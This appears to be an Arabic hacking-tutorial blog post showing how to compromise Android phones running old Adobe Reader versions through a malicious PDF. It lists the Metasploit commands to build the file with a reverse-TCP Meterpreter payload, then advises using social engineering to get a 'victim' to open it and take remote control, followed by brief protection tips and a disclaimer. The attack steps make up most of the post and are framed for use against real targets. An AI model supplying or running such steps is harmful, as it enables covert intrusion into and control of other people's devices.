مافيا سفن أكس - Mafia7x

اختراق أجهزة Android بملف PDF عن طريق استغلال Adobe reader

صورة الكاتب - Mafia7x - نشر في 06-11-2021 | التصنيف: اختبار الاختراق
Hack-Android-With-PDF

سنتعلم في هذا الدرس كيفية اختراق هاتف Android باستخدام ملف PDF لاحظ أن هذه ثغرة قديمة تم إصلاحها ولا تعمل على الهواتف الحديثة ، لكن الهواتف القديمة لا تزال عرضة لهذا الهجوم ، يعمل هذا الاختراق مع الإصدارات التي قبل 11.2.0 من برنامج Adobe Reader على أجهزة Android ، تعمل هذه الثغرة الأمنية على تنفيذ تعليمات برمجية عن بُعد في قارئ Adobe والتي يمكن أن تساعدنا في التحكم في جهاز Android عبر ملف PDF ضار تم إنشاؤه باستخدام أداة Metasploit.


كيف يتم هذا الأختراق

تحتوي إصدارات  11.2.0 والتي قبلها في برنامج Adobe Reader Android على ثغرة أمنية خطيرة تعرض الواجهات الأصلية الغير أمنة لجافا سكريبت غير موثوق به داخل ملف PDF ، يعمل هذا الاختراق من خلال تضمين الاستغلال من استغلال متصفح android/webview_addjavascriptinterface الذي قمنا به في الدرس السابق ، يستخدم هذا الاختراق ملف PDF كناقل للحصول على الـ Shell على أجهزة Android التي تحتوي على إصدار ضعيف من Adobe Reader ، ببساطة نحن نستخدم ثغرة أمنية في قارئ Adobe لاستغلال جهاز Android واختراقه وتشغيل كود Javascript ضار عبر واجهة قارئ Adobe.


شاهد أيضا كيفية تتبع موقع اي شخص عن طريق أداة Seeker مع تثبيت Ngrok.

اختراق أجهزة Android بملف PDF

الخطوة 1: افتح الـ Terminal

في الخطوة الأولى عليك فتح  الـ Terminal أو الـ Termux أذا كنت تستعمل الاندرويد وأيضا أذا كنت تود استعمال الـ Terminal في الأندرويد فتستطيع رؤية درس "تثبيت الكالي لينكس على الاندرويد واجهة رسومية" ، والأن افتح وحدة التحكم Metasploit عن طريق الأمر التالي لأختراق هواتف الـ Android عن طريق ملف PDF:

msfconsole
 

والأن لقد قمنا بتشغيل أداة Metasploit كما موضح في الصورة التالية:

الخطوة 2: قم بعمل ملف PDF الضار مع استغلال قارئ Adobe

لإنشاء ملف PDF ضار ، أكتب الأوامر التالية في وحدة تحكم msf:

use exploit/android/fileformat/adobe_reader_pdf_js_interface
Set payload android/meterpreter/reverse_tcp
set lhost 192.168.182.136 (your IP here)
set port 20068
exploit
 

والان قد تم أنشاء ملف PDF الضار كما موضح في الصورة التالية:


شاهد أيضا أداة Black Widow لفحص المواقع من الثغرات.

الخطوة 3: اختراق جهاز Android باستخدام ملف PDF

الآن بعد أن أصبح ملف PDF الضار جاهزًا ، استخدم الهندسة الاجتماعية لإرسال ملف PDF الضار للضحية ، يمكنك استخدام أي محرر PDF لتحرير الملف وإضافة بعض المحتوى لجعل الملف يبدو أكثر واقعية.

في حالتي مسار المجلد هو root/.msf4/local/msf.pdf كما موضح في الصورة التالية:

في حالتي ، ملف PDF هو msf.pdf ، ولكن يمكنك دائمًا تغيير الاسم إلى شيء تنقر عليه الضحية.

ملاحظة: يعمل هذا الهجوم فقط على أجهزة Android محدودة ذات واجهة برمجة تطبيقات لعرض الويب ضعيفة وإصدارات قديمة من قارئ Adobe.

الخطوة 4: أستمتع بالاختراق

بمجرد أن تفتح الضحية ملف PDF الضار ، سيتم اختراق هاتف Android ، وسوف نحصل على وصول Shell ، ويمكنك التحكم فيه عن بُعد باستخدام Meterpreter shell ، هذا هو مدى سهولة اختراق جهاز Android باستخدام ملف PDF.


كيفية الحماية من هذا الاختراق

قم بتحديث جهازك: تم إصلاح هذا الخطأ منذ فترة طويلة بواسطة Adobe و Android ، تأكد من تحديث جهاز Android الخاص بك وجميع التطبيقات التي تستخدمها.

قم بتغيير جهاز Android الخاص بك: اشترِ جهاز Android جديدًا بآخر التحديثات.

متجر التطبيقات: قم فقط بتثبيت التطبيقات من متجر التطبيقات الرسمي ، لا تفتح روابط وملفات غير معروفة ولا تثق بها ابداً.

تثبيت مضاد فيروسات: قم بتثبيت مضاد فيروسات جيد على هاتف Android الخاص بك.


شاهد أيضا أداة Zydra لكسر باسورد جميع أنواع الملفات.

الأسئلة المتداولة عن هذا الأستغلال

س 1) هل يعمل على جميع هواتف أندرويد؟

لا ، فقط مع هواتف Android التي تحتوي على إصدار ضعيف من برنامج Adobe reader المثبت وإصدار Android Lollipop والإصدارات الأقل.

س 2) أنها لا تعمل على نظام Kali الخاص بي؟

قم بتحديث Kali Linux وحاول مرة أخرى ، أستخدم الأمر sudo apt-get dist-upgrade ، حاول تكرار كل الخطوات المذكورة في الدرس ، إذا تلقيت أي خطأ محدد ، فاذكره في قسم التعليقات.


خاتمة

وهنا وصلنا لنهاية هذه التدوينة قد تعرفنا الأن على طريقة أختراق أجهزة الـ Android عن طريق أستغلال ثغرة أمنية في قارئ Adobe لاستغلال جهاز Android واختراقه وتشغيل كود Javascript ضار عبر واجهة قارئ Adobe ، وايضا انا أخلي مسؤليتي لأي استخدام سيء لهذه التدوينة وأنها لأغراض تعليمية فقط وكاتب التدوينة غير مسؤل عن أي شيء يحدث لأي شخص ومع السلامة.

كاتب التدوينة
صورة التدوينة
Mafia7x   

     لا يوجد وصف Ok

close

عن أبي هريرة(رضي الله عنه): (قال رسول الله (صلى الله عليه وسلم):(كلمتان خفيفتان على اللسان، ثقيلتان في الميزان، حبيبتان إلى الرحمن: سبحان الله وبحمده، سبحان الله العظيم))